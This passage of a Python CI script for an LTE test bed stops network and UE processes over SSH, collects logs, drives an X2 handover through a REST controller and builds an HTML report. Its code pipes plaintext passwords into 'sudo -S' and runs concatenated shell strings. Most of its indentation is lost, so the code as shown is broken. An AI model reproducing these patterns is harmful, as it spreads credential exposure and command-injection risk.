statMsg = 'UE showed ' + str(mbms_messages) + ' "TRIED TO PUSH MBMS DATA" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
else:
statMsg = 'UE did NOT SHOW "TRIED TO PUSH MBMS DATA" message(s)'
logging.debug('\u001B[1;30;41m ' + statMsg + ' \u001B[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if foundSegFault:
logging.debug('\u001B[1;37;41m UE ended with a Segmentation Fault! \u001B[0m')
return ENB_PROCESS_SEG_FAULT
if foundAssertion:
logging.debug('\u001B[1;30;43m UE showed an assertion! \u001B[0m')
self.htmlUEFailureMsg += 'UE showed an assertion!\n'
if not mib_found or not frequency_found:
return OAI_UE_PROCESS_ASSERTION
if foundRealTimeIssue:
logging.debug('\u001B[1;37;41m UE faced real time issues! \u001B[0m')
self.htmlUEFailureMsg += 'UE faced real time issues!\n'
#return ENB_PROCESS_REALTIME_ISSUE
if no_cell_sync_found and not mib_found:
logging.debug('\u001B[1;37;41m UE could not synchronize ! \u001B[0m')
self.htmlUEFailureMsg += 'UE could not synchronize!\n'
return OAI_UE_PROCESS_COULD_NOT_SYNC
return 0
def TerminateeNB(self):
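		"""
		Stop the lte-softmodem on the selected eNB server (SIGINT first,
		SIGKILL if it survives). When the T tracer is enabled, also stop tshark
		on the EPC side and replay/analyze the raw record file; otherwise
		analyze the eNB log file if one was produced.
		"""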
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(lIpAddr, lUserName, lPassWord)
self.command('cd ' + lSourcePath + '/cmake_targets', '\$', 5)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + lPassWord + ' | sudo -S daemon --name=enb' + str(self.eNB_instance) + '_daemon --stop', '\$', 5)
self.command('echo ' + lPassWord + ' | sudo -S killall --signal SIGINT lte-softmodem || true', '\$', 5)
time.sleep(10)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + lPassWord + ' | sudo -S killall --signal SIGKILL lte-softmodem || true', '\$', 5)
time.sleep(5)
self.command('rm -f my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.close()
		# If the tracer option is on, stop tshark on the EPC side
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
logging.debug('\u001B[1m Stopping tshark \u001B[0m')
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL tshark', '\$', 5)
time.sleep(1)
if self.EPC_PcapFileName != '':
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 666 /tmp/' + self.EPC_PcapFileName, '\$', 5)
self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, '/tmp/' + self.EPC_PcapFileName, '.')
self.copyout(lIpAddr, lUserName, lPassWord, self.EPC_PcapFileName, lSourcePath + '/cmake_targets/.')
self.close()
logging.debug('\u001B[1m Replaying RAW record file\u001B[0m')
self.open(lIpAddr, lUserName, lPassWord)
self.command('cd ' + lSourcePath + '/common/utils/T/tracer/', '\$', 5)
enbLogFile = self.eNBLogFiles[int(self.eNB_instance)]
raw_record_file = enbLogFile.replace('.log', '_record.raw')
replay_log_file = enbLogFile.replace('.log', '_replay.log')
extracted_txt_file = enbLogFile.replace('.log', '_extracted_messages.txt')
extracted_log_file = enbLogFile.replace('.log', '_extracted_messages.log')
self.command('./extract_config -i ' + lSourcePath + '/cmake_targets/' + raw_record_file + ' > ' + lSourcePath + '/cmake_targets/' + extracted_txt_file, '\$', 5)
self.command('echo $USER; nohup ./replay -i ' + lSourcePath + '/cmake_targets/' + raw_record_file + ' > ' + lSourcePath + '/cmake_targets/' + replay_log_file + ' 2>&1 &', lUserName, 5)
self.command('./textlog -d ' + lSourcePath + '/cmake_targets/' + extracted_txt_file + ' -no-gui -ON -full > ' + lSourcePath + '/cmake_targets/' + extracted_log_file, '\$', 5)
self.close()
self.copyin(lIpAddr, lUserName, lPassWord, lSourcePath + '/cmake_targets/' + extracted_log_file, '.')
logging.debug('\u001B[1m Analyzing eNB replay logfile \u001B[0m')
logStatus = self.AnalyzeLogFile_eNB(extracted_log_file)
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.eNBLogFiles[int(self.eNB_instance)] = ''
else:
analyzeFile = False
if self.eNBLogFiles[int(self.eNB_instance)] != '':
analyzeFile = True
fileToAnalyze = self.eNBLogFiles[int(self.eNB_instance)]
self.eNBLogFiles[int(self.eNB_instance)] = ''
if analyzeFile:
copyin_res = self.copyin(lIpAddr, lUserName, lPassWord, lSourcePath + '/cmake_targets/' + fileToAnalyze, '.')
if (copyin_res == -1):
logging.debug('\u001B[1;37;41m Could not copy eNB logfile to analyze it! \u001B[0m')
self.htmleNBFailureMsg = 'Could not copy eNB logfile to analyze it!'
self.CreateHtmlTestRow('N/A', 'KO', ENB_PROCESS_NOLOGFILE_TO_ANALYZE)
self.eNBmbmsEnables[int(self.eNB_instance)] = False
return
if self.eNB_serverId != '0':
self.copyout(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, './' + fileToAnalyze, self.eNBSourceCodePath + '/cmake_targets/')
logging.debug('\u001B[1m Analyzing eNB logfile \u001B[0m ' + fileToAnalyze)
logStatus = self.AnalyzeLogFile_eNB(fileToAnalyze)
if (logStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', logStatus)
					self.prematureExit = True
self.eNBmbmsEnables[int(self.eNB_instance)] = False
return
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.eNBmbmsEnables[int(self.eNB_instance)] = False
def TerminateHSS(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT oai_hss || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep hss | grep -v grep', '\$', 5)
result = re.search('oai_hss -j', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL oai_hss || true', '\$', 5)
self.command('rm -f ' + self.EPCSourceCodePath + '/scripts/my-hss.sh', '\$', 5)
elif re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_hss oai_hss || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep hss | grep -v grep', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_hss oai_hss || true', '\$', 5)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S daemon --name=simulated_hss --stop', '\$', 5)
time.sleep(1)
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL hss_sim', '\$', 5)
else:
logging.error('This should not happen!')
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateMME(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE) or re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_mme mme || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep mme | grep -v grep', '\$', 5)
result = re.search('mme -c', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_mme mme || true', '\$', 5)
self.command('rm -f ' + self.EPCSourceCodePath + '/scripts/my-mme.sh', '\$', 5)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./stop_mme', '\$', 5)
else:
logging.error('This should not happen!')
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateSPGW(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT spgwc spgwu || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep spgw | grep -v grep', '\$', 5)
result = re.search('spgwc -c |spgwu -c ', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL spgwc spgwu || true', '\$', 5)
self.command('rm -f ' + self.EPCSourceCodePath + '/scripts/my-spgw*.sh', '\$', 5)
self.command('stdbuf -o0 ps -aux | grep tshark | grep -v grep', '\$', 5)
result = re.search('-w ', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT tshark || true', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 666 ' + self.EPCSourceCodePath + '/scripts/*.pcap', '\$', 5)
elif re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_spgw spgw || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep spgw | grep -v grep', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_spgw spgw || true', '\$', 5)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./stop_xGw', '\$', 5)
else:
logging.error('This should not happen!')
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateFlexranCtrl(self):
if self.flexranCtrlInstalled == False or self.flexranCtrlStarted == False:
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('echo ' + self.EPCPassword + ' | sudo -S daemon --name=flexran_rtc_daemon --stop', '\$', 5)
time.sleep(1)
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL rt_controller', '\$', 5)
time.sleep(1)
self.close()
self.flexranCtrlStarted = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateUE_common(self, device_id, idx):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
			# switch airplane mode back on (i.e. radio off)
if self.ADBCentralized:
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "ps | grep --color=never iperf | grep -v grep"', '\$', 5)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ps | grep --color=never iperf | grep -v grep"\'', '\$', 60)
result = re.search('shell +(?P<pid>\d+)', str(self.ssh.before))
if result is not None:
pid_iperf = result.group('pid')
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "kill -KILL ' + pid_iperf + '"', '\$', 5)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "kill -KILL ' + pid_iperf + '"\'', '\$', 60)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def TerminateUE(self):
terminate_ue_flag = True
self.GetAllUEDevices(terminate_ue_flag)
multi_jobs = []
i = 0
for device_id in self.UEDevices:
p = Process(target= SSH.TerminateUE_common, args = (device_id,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateOAIUE(self):
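		"""Stop the OAI UE softmodem (SIGINT first, SIGKILL if it survives), then retrieve and analyze its logfile to set the test verdict."""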
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
self.command('ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S daemon --name=ue' + str(self.UE_instance) + '_daemon --stop', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal SIGINT lte-uesoftmodem || true', '\$', 5)
time.sleep(10)
self.command('ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal SIGKILL lte-uesoftmodem || true', '\$', 5)
time.sleep(5)
self.command('rm -f my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
self.close()
result = re.search('ue_', str(self.UELogFile))
if result is not None:
copyin_res = self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/' + self.UELogFile, '.')
if (copyin_res == -1):
logging.debug('\u001B[1;37;41m Could not copy UE logfile to analyze it! \u001B[0m')
self.htmlUEFailureMsg = 'Could not copy UE logfile to analyze it!'
self.CreateHtmlTestRow('N/A', 'KO', OAI_UE_PROCESS_NOLOGFILE_TO_ANALYZE, 'UE')
self.UELogFile = ''
return
logging.debug('\u001B[1m Analyzing UE logfile \u001B[0m')
logStatus = self.AnalyzeLogFile_UE(self.UELogFile)
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
if result is not None:
ueAction = 'Sniffing'
else:
ueAction = 'Connection'
if (logStatus < 0):
logging.debug('\u001B[1m' + ueAction + ' Failed \u001B[0m')
self.htmlUEFailureMsg = '<b>' + ueAction + ' Failed</b>\n' + self.htmlUEFailureMsg
self.CreateHtmlTestRow('N/A', 'KO', logStatus, 'UE')
# In case of sniffing on commercial eNBs we have random results
# Not an error then
if (logStatus != OAI_UE_PROCESS_COULD_NOT_SYNC) or (ueAction != 'Sniffing'):
self.Initialize_OAI_UE_args = ''
self.AutoTerminateUEandeNB()
else:
logging.debug('\u001B[1m' + ueAction + ' Completed \u001B[0m')
self.htmlUEFailureMsg = '<b>' + ueAction + ' Completed</b>\n' + self.htmlUEFailureMsg
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.UELogFile = ''
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def AutoTerminateUEandeNB(self):
if (self.ADBIPAddress != 'none'):
self.testCase_id = 'AUTO-KILL-UE'
self.desc = 'Automatic Termination of UE'
self.ShowTestID()
self.TerminateUE()
if (self.Initialize_OAI_UE_args != ''):
self.testCase_id = 'AUTO-KILL-UE'
self.desc = 'Automatic Termination of UE'
self.ShowTestID()
self.TerminateOAIUE()
if (self.Initialize_eNB_args != ''):
self.testCase_id = 'AUTO-KILL-eNB'
self.desc = 'Automatic Termination of eNB'
self.ShowTestID()
self.eNB_instance = '0'
self.TerminateeNB()
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.testCase_id = 'AUTO-KILL-flexran-ctl'
self.desc = 'Automatic Termination of FlexRan CTL'
self.ShowTestID()
self.TerminateFlexranCtrl()
self.prematureExit = True
def IdleSleep(self):
time.sleep(self.idle_sleep_time)
self.CreateHtmlTestRow(str(self.idle_sleep_time) + ' sec', 'OK', ALL_PROCESSES_OK)
def X2_Status(self, idx, fileName):
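		"""Snapshot the FlexRAN controller state into fileName via its REST API (curl + jq); records the per-eNB lists of connected UE RNTIs (idx 0 = pre-handover, idx 1 = post-handover) and returns a printable summary."""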
cmd = "curl --silent http://" + self.EPCIPAddress + ":9999/stats | jq '.' > " + fileName
message = cmd + '\n'
logging.debug(cmd)
subprocess.run(cmd, shell=True)
if idx == 0:
cmd = "jq '.mac_stats | length' " + fileName
strNbEnbs = subprocess.check_output(cmd, shell=True, universal_newlines=True)
self.x2NbENBs = int(strNbEnbs.strip())
cnt = 0
while cnt < self.x2NbENBs:
cmd = "jq '.mac_stats[" + str(cnt) + "].bs_id' " + fileName
bs_id = subprocess.check_output(cmd, shell=True, universal_newlines=True)
self.x2ENBBsIds[idx].append(bs_id.strip())
cmd = "jq '.mac_stats[" + str(cnt) + "].ue_mac_stats | length' " + fileName
stNbUEs = subprocess.check_output(cmd, shell=True, universal_newlines=True)
nbUEs = int(stNbUEs.strip())
ueIdx = 0
self.x2ENBConnectedUEs[idx].append([])
while ueIdx < nbUEs:
cmd = "jq '.mac_stats[" + str(cnt) + "].ue_mac_stats[" + str(ueIdx) + "].rnti' " + fileName
rnti = subprocess.check_output(cmd, shell=True, universal_newlines=True)
self.x2ENBConnectedUEs[idx][cnt].append(rnti.strip())
ueIdx += 1
cnt += 1
msg = "FlexRan Controller is connected to " + str(self.x2NbENBs) + " eNB(s)"
logging.debug(msg)
message += msg + '\n'
cnt = 0
while cnt < self.x2NbENBs:
msg = " -- eNB: " + str(self.x2ENBBsIds[idx][cnt]) + " is connected to " + str(len(self.x2ENBConnectedUEs[idx][cnt])) + " UE(s)"
logging.debug(msg)
message += msg + '\n'
ueIdx = 0
while ueIdx < len(self.x2ENBConnectedUEs[idx][cnt]):
msg = " -- UE rnti: " + str(self.x2ENBConnectedUEs[idx][cnt][ueIdx])
logging.debug(msg)
message += msg + '\n'
ueIdx += 1
cnt += 1
return message
def Perform_X2_Handover(self):
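		"""Trigger a network-initiated X2 handover through the FlexRAN controller, then compare the per-eNB UE counts before and after to decide whether the UEs actually moved."""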
html_queue = SimpleQueue()
fullMessage = '<pre style="background-color:white">'
msg = 'Doing X2 Handover w/ option ' + self.x2_ho_options
logging.debug(msg)
fullMessage += msg + '\n'
if self.x2_ho_options == 'network':
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.x2ENBBsIds = []
self.x2ENBConnectedUEs = []
self.x2ENBBsIds.append([])
self.x2ENBBsIds.append([])
self.x2ENBConnectedUEs.append([])
self.x2ENBConnectedUEs.append([])
fullMessage += self.X2_Status(0, self.testCase_id + '_pre_ho.json')
msg = "Activating the X2 Net control on each eNB"
logging.debug(msg)
fullMessage += msg + '\n'
eNB_cnt = self.x2NbENBs
cnt = 0
while cnt < eNB_cnt:
cmd = "curl --silent -XPOST http://" + self.EPCIPAddress + ":9999/rrc/x2_ho_net_control/enb/" + str(self.x2ENBBsIds[0][cnt]) + "/1"
logging.debug(cmd)
fullMessage += cmd + '\n'
subprocess.run(cmd, shell=True)
cnt += 1
# Waiting for the activation to be active
time.sleep(20)
msg = "Switching UE(s) from eNB to eNB"
logging.debug(msg)
fullMessage += msg + '\n'
cnt = 0
while cnt < eNB_cnt:
ueIdx = 0
while ueIdx < len(self.x2ENBConnectedUEs[0][cnt]):
cmd = "curl --silent -XPOST http://" + self.EPCIPAddress + ":9999/rrc/ho/senb/" + str(self.x2ENBBsIds[0][cnt]) + "/ue/" + str(self.x2ENBConnectedUEs[0][cnt][ueIdx]) + "/tenb/" + str(self.x2ENBBsIds[0][eNB_cnt - cnt - 1])
logging.debug(cmd)
fullMessage += cmd + '\n'
subprocess.run(cmd, shell=True)
ueIdx += 1
cnt += 1
time.sleep(20)
# check
logging.debug("Checking the Status after X2 Handover")
fullMessage += self.X2_Status(1, self.testCase_id + '_post_ho.json')
cnt = 0
x2Status = True
while cnt < eNB_cnt:
if len(self.x2ENBConnectedUEs[0][cnt]) == len(self.x2ENBConnectedUEs[1][cnt]):
x2Status = False
cnt += 1
if x2Status:
msg = "X2 Handover was successful"
logging.debug(msg)
fullMessage += msg + '</pre>'
html_queue.put(fullMessage)
self.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
else:
msg = "X2 Handover FAILED"
logging.error(msg)
fullMessage += msg + '</pre>'
html_queue.put(fullMessage)
					self.CreateHtmlTestRowQueue('N/A', 'KO', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRow('Cannot perform requested X2 Handover', 'KO', ALL_PROCESSES_OK)
def LogCollectBuild(self):
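		"""Zip the cmake_targets build logs on whichever host (eNB first, else UE) has credentials configured."""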
if (self.eNBIPAddress != '' and self.eNBUserName != '' and self.eNBPassword != ''):
IPAddress = self.eNBIPAddress
UserName = self.eNBUserName
Password = self.eNBPassword
SourceCodePath = self.eNBSourceCodePath
elif (self.UEIPAddress != '' and self.UEUserName != '' and self.UEPassword != ''):
IPAddress = self.UEIPAddress
UserName = self.UEUserName
Password = self.UEPassword
SourceCodePath = self.UESourceCodePath
else:
sys.exit('Insufficient Parameter')
self.open(IPAddress, UserName, Password)
self.command('cd ' + SourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('rm -f build.log.zip', '\$', 5)
self.command('zip build.log.zip build_log_*/*', '\$', 60)
self.close()
def LogCollecteNB(self):
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm -f enb.log.zip', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S zip enb.log.zip enb*.log core* enb_*record.raw enb_*.pcap enb_*txt', '\$', 60)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm enb*.log core* enb_*record.raw enb_*.pcap enb_*txt', '\$', 5)
self.close()
def LogCollectPing(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f ping.log.zip', '\$', 5)
self.command('zip ping.log.zip ping*.log', '\$', 60)
self.command('rm ping*.log', '\$', 5)
self.close()
def LogCollectIperf(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f iperf.log.zip', '\$', 5)
self.command('zip iperf.log.zip iperf*.log', '\$', 60)
self.command('rm iperf*.log', '\$', 5)
self.close()
def LogCollectHSS(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('rm -f hss.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE) or re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('zip hss.log.zip hss*.log', '\$', 60)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm hss*.log', '\$', 5)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('zip hss.log.zip logs/hss*.* *.pcap', '\$', 60)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f logs/hss*.* *.pcap', '\$', 5)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cp /opt/hss_sim0609/hss.log .', '\$', 60)
self.command('zip hss.log.zip hss.log', '\$', 60)
else:
logging.error('This option should not occur!')
self.close()
def LogCollectMME(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('rm -f mme.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE) or re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('zip mme.log.zip mme*.log', '\$', 60)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm mme*.log', '\$', 5)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cp /opt/ltebox/var/log/*Log.0 .', '\$', 5)
self.command('zip mme.log.zip mmeLog.0 s1apcLog.0 s1apsLog.0 s11cLog.0 libLog.0 s1apCodecLog.0', '\$', 60)
else:
logging.error('This option should not occur!')
self.close()
def LogCollectSPGW(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('rm -f spgw.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE) or re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('zip spgw.log.zip spgw*.log', '\$', 60)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm spgw*.log', '\$', 5)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cp /opt/ltebox/var/log/xGwLog.0 .', '\$', 5)
self.command('zip spgw.log.zip xGwLog.0', '\$', 60)
else:
logging.error('This option should not occur!')
self.close()
def LogCollectOAIUE(self):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S rm -f ue.log.zip', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S zip ue.log.zip ue*.log core* ue_*record.raw ue_*.pcap ue_*txt', '\$', 60)
self.command('echo ' + self.UEPassword + ' | sudo -S rm ue*.log core* ue_*record.raw ue_*.pcap ue_*txt', '\$', 5)
self.close()
def RetrieveSystemVersion(self, machine):
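		"""Collect OS, kernel, UHD, USRP and CPU details from the eNB or UE host for the HTML footer; returns -1 when that host is not configured."""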
if self.eNBIPAddress == 'none' or self.UEIPAddress == 'none':
self.OsVersion = 'Ubuntu 16.04.5 LTS'
self.KernelVersion = '4.15.0-45-generic'
self.UhdVersion = '3.13.0.1-0'
self.UsrpBoard = 'B210'
self.CpuNb = '4'
self.CpuModel = 'Intel(R) Core(TM) i5-6200U'
self.CpuMHz = '2399.996 MHz'
return 0
if machine == 'eNB':
if self.eNBIPAddress != '' and self.eNBUserName != '' and self.eNBPassword != '':
IPAddress = self.eNBIPAddress
UserName = self.eNBUserName
Password = self.eNBPassword
else:
return -1
if machine == 'UE':
if self.UEIPAddress != '' and self.UEUserName != '' and self.UEPassword != '':
IPAddress = self.UEIPAddress
UserName = self.UEUserName
Password = self.UEPassword
else:
return -1
self.open(IPAddress, UserName, Password)
self.command('lsb_release -a', '\$', 5)
result = re.search('Description:\\\\t(?P<os_type>[a-zA-Z0-9\-\_\.\ ]+)', str(self.ssh.before))
if result is not None:
self.OsVersion = result.group('os_type')
logging.debug('OS is: ' + self.OsVersion)
self.command('uname -r', '\$', 5)
result = re.search('uname -r\\\\r\\\\n(?P<kernel_version>[a-zA-Z0-9\-\_\.]+)', str(self.ssh.before))
if result is not None:
self.KernelVersion = result.group('kernel_version')
logging.debug('Kernel Version is: ' + self.KernelVersion)
self.command('dpkg --list | egrep --color=never libuhd003', '\$', 5)
result = re.search('libuhd003:amd64 *(?P<uhd_version>[0-9\.]+)', str(self.ssh.before))
if result is not None:
self.UhdVersion = result.group('uhd_version')
logging.debug('UHD Version is: ' + self.UhdVersion)
self.command('echo ' + Password + ' | sudo -S uhd_find_devices', '\$', 15)
result = re.search('product: (?P<usrp_board>[0-9A-Za-z]+)\\\\r\\\\n', str(self.ssh.before))
if result is not None:
self.UsrpBoard = result.group('usrp_board')
logging.debug('USRP Board is: ' + self.UsrpBoard)
self.command('lscpu', '\$', 5)
result = re.search('CPU\(s\): *(?P<nb_cpus>[0-9]+).*Model name: *(?P<model>[a-zA-Z0-9\-\_\.\ \(\)]+).*CPU MHz: *(?P<cpu_mhz>[0-9\.]+)', str(self.ssh.before))
if result is not None:
self.CpuNb = result.group('nb_cpus')
logging.debug('nb_cpus: ' + self.CpuNb)
self.CpuModel = result.group('model')
logging.debug('model: ' + self.CpuModel)
self.CpuMHz = result.group('cpu_mhz') + ' MHz'
logging.debug('cpu_mhz: ' + self.CpuMHz)
self.close()
#-----------------------------------------------------------
# HTML Reporting....
#-----------------------------------------------------------
def CreateHtmlHeader(self):
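		"""Write the static top of test_results.html: job banner, git info table and one nav pill per XML test file. Each pill holds a __STATE_<tab>__ placeholder that CreateHtmlTabFooter later patches with the final verdict."""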
if (not self.htmlHeaderCreated):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1m Creating HTML header \u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
self.htmlFile = open('test_results.html', 'w')
self.htmlFile.write('<!DOCTYPE html>\n')
self.htmlFile.write('<html class="no-js" lang="en-US">\n')
self.htmlFile.write('<head>\n')
